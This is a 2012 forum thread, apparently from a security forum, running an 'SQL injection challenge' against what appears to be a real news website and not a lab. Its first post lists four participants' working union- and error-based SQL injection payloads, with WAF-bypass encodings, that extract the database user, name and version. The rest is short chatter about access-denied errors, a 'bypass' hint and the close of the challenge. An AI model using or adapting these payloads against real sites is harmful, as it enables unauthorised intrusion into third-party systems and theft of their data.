Wubi, posted October 3, 2012 (edited)

No...
Target: News: Scene sexy per Alanis - Newsic
Method: Union Based
Requirements: User(), Database() or Version().
Proof:
The site was found by Sheyken...

[TABLE=class: grid, width: 800]
[TR][TD]Solvers:[/TD][TD]Syntax:[/TD][/TR]
[TR][TD]Sheyken[/TD][TD]+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- /* and */ ?id=-25890+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--[/TD][/TR]
[TR][TD]fallen_angel[/TD][TD]?id=-25890+uNion+/*!se%6cect*/+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+-[/TD][/TR]
[TR][TD]neo.hapsis[/TD][TD]?id=null%0Dunion%0Dselect+1,2,3,4,5,NULL,0x3c623e6e656f2e686170736973,0x7468616e6b7320666f7220746865206368616c6c656e6765,9,10,11,12,13,14,group_concat(user(),0x3a,database(),0x3a,version()),16,17,18,19,20,21,22,23,24,25,26,NULL,28,29,30--[/TD][/TR]
[TR][TD]Sweby[/TD][TD]?id=25890+and+1=2+UNION%0BSELECT+1,2,3,4,5,user(),group_concat(version(),0x3a,database()),8,9,10,11,12,13,14,concat(0x49206861746520746f20627970617373207468696e6773),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+/*[/TD][/TR]
[/TABLE]

Edited October 8, 2012 by Wubi

fallen_angel, posted October 3, 2012

You have a PM. I'm not uploading a picture anymore because I'm on Digi Mobil and it's barely working.

neo.hapsis, posted October 3, 2012

Done! Thanks for the challenge!

EterNo, posted October 5, 2012

It would be nice if, after you finish the competition, you also posted a syntax so that we can understand too. I managed to find the number of columns, but after that I get ACCESS DENIED when I write select.

Wubi (Author), posted October 5, 2012

[QUOTE]It would be nice if, after you finish the competition, you also posted a syntax so that we can understand too. I managed to find the number of columns, but after that I get ACCESS DENIED when I write select.[/QUOTE]

If you had followed the previous challenges (https://rstcenter.com/forum/59702-easy-sqli-2-a.rst ; https://rstcenter.com/forum/59689-easy-tricky-sqli.rst), or even looked more carefully at the solvers table in the first post, the 2nd row is dedicated to the syntaxes used. When I decide to end the challenge I will add the syntaxes too. Until then keep trying, hint: bypass.

Sweby, posted October 5, 2012 (edited)

Edited October 5, 2012 by Sweby

gafi, posted October 8, 2012

When do we see the results?

Wubi (Author), posted October 8, 2012

[QUOTE]When do we see the results?[/QUOTE]

Now. Closed.